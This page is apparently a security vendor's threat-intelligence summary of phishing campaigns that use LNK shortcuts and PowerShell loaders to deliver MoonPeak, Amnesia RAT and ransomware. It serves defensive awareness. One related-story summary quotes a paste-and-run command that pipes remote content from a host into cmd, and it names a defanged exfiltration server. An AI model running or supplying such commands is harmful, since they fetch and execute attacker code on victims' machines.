Phishing campaigns using Windows LNK files and PowerShell loaders to deliver RATs and ransomware
Multiple recent intrusion reports describe phishing-led Windows compromises that rely on weaponized .LNK shortcuts to trigger obfuscated PowerShell execution, display decoy documents, and then fetch additional payloads from public cloud/code platforms. In South Korea, attackers distributed an LNK disguised as financial trading guidance that opens a decoy PDF while running PowerShell; subsequent stages perform anti-analysis/virtualization checks, establish persistence, and retrieve a masked executable from GitHub that decrypts code at runtime to run MoonPeak malware. Researchers assessed the activity as likely North Korea–linked based on GitHub commit metadata and naming patterns.
A separate Russia-targeted campaign used business-themed archives containing decoy documents and a malicious LNK to pull a PowerShell loader that establishes persistence and then weakens defenses (including Microsoft Defender exclusion changes and use of defendnot), performs reconnaissance, and tampers with system tooling and file associations before deploying Amnesia RAT (fetched from Dropbox) and a Hakuna Matata–derived ransomware payload for encryption. By contrast, reporting on KazakRAT describes a different espionage operation in Kazakhstan/Afghanistan delivered via malicious MSI installers and using simple, unencrypted HTTP C2; it is not part of the LNK/PowerShell delivery chains described in the other incidents.
Get ahead of threats like this
Mallory correlates global threat intelligence with your attack surface — know if you’re exposed before adversaries strike.
How this story unfolded
4 events from the most recent confirmed update back to the earliest known activity.
Amnesia RAT campaign escalates to ransomware and system lockout
In the later stages of the Russia-targeted campaign, attackers deployed Amnesia RAT for credential, browser, wallet, and app data theft, then delivered a Hakuna Matata-derived ransomware payload. The malware encrypted files, dropped ransom notes, changed the wallpaper, and used a WinLocker component to block the desktop while also hijacking cryptocurrency clipboard addresses.
FortiGuard Labs reports Amnesia RAT phishing campaign targeting Russian users
FortiGuard Labs disclosed a multi-stage phishing campaign aimed primarily at users in Russia that used business- or accounting-themed archive files containing malicious LNK shortcuts. The infection chain relied on PowerShell loaders, public services such as GitHub and Dropbox, and social engineering rather than software exploits to achieve full compromise.
Researchers link MoonPeak activity to North Korea–aligned actors
Analysts assessed that the MoonPeak campaign was likely conducted by North Korea–linked threat actors based on GitHub commit email artifacts and file-naming patterns observed during the investigation.
MoonPeak malware intrusions target Windows systems in South Korea
Researchers reported advanced intrusions compromising Windows systems in South Korea using malicious LNK files disguised as financial trading guidance. The shortcut displayed a decoy PDF while launching obfuscated PowerShell that established persistence, performed anti-analysis checks, and downloaded a GitHub-hosted MoonPeak payload.
Related entities
Vulnerabilities, threat actors, malware, products, organizations, and breaches Mallory has linked to this story.
Sources
3 references tracked. Mallory keeps watching after this page renders.
Amnesia RAT deployed in multi-stage phishing attacks against Russian users
securityaffairs.com
Open sourceMoonPeak malware spread via weaponized LNK files | SC Media
scworld.com
Open sourceAmnesia RAT, ransomware spread in new Russia-targeted phishing campaign | SC Media
scworld.com
Open sourceSee the full picture, correlated to your attack surface.
Map indicators from this story to your assets and identify affected systems in minutes.
Every observed campaign, victim, and pivot linked to actors named in this story.
Malware, exploits, and IOCs connected to the activity described here.
YARA, Sigma, and Snort rules deployed to your SIEM as soon as they’re published.
Get matching new stories delivered to your team as they break — not the next morning.
Ask questions about this story and take action on the answers.
Related stories
Other stories Mallory is tracking that overlap on entities, sources, or topic labels.
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
Mar 21, 2026
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
Mar 21, 2026
Threat actors abuse shortcut files and legitimate RMM tools to gain persistent access to Windows systems
Threat actors are increasingly relying on *living-off-the-land* techniques and trusted tooling to establish persistent access on Windows endpoints. One campaign used weaponized Windows shortcut (`.LNK`) files disguised as investment-related PDFs to deliver **MoonPeak**, a remote access trojan assessed as a **XenoRAT** variant and linked to North Korea–aligned activity targeting South Korean investors and cryptocurrency traders. Opening the `.LNK` launches an obfuscated PowerShell-driven, multi-stage infection chain while displaying a decoy PDF; analysis also tied payload hosting to attacker-controlled GitHub repositories, reflecting “Living Off Trusted Sites (LOTS)” tradecraft. A separate dual-wave intrusion chain used phishing emails masquerading as *Greenvelope* invitations to steal webmail credentials (e.g., Outlook, Yahoo, AOL), then used the compromised accounts to register for and silently deploy **LogMeIn Resolve** (formerly *GoTo Resolve*) for persistent remote access. The installer (`GreenVelopeCard.exe`) was described as signed and configured to connect to attacker-controlled infrastructure, with follow-on actions including modifying service settings for elevated access and creating hidden scheduled tasks for resilience. Related threat intelligence reporting also highlighted broader “rogue RMM” abuse trends, including **Remcos** and **NetSupport Manager** delivery via paste-and-run lures and PowerShell/`cmd` execution chains (including use of the `finger` utility to fetch remote payloads), underscoring that adversaries are operationalizing legitimate remote administration software as a stealthy backdoor mechanism.
Mar 21, 2026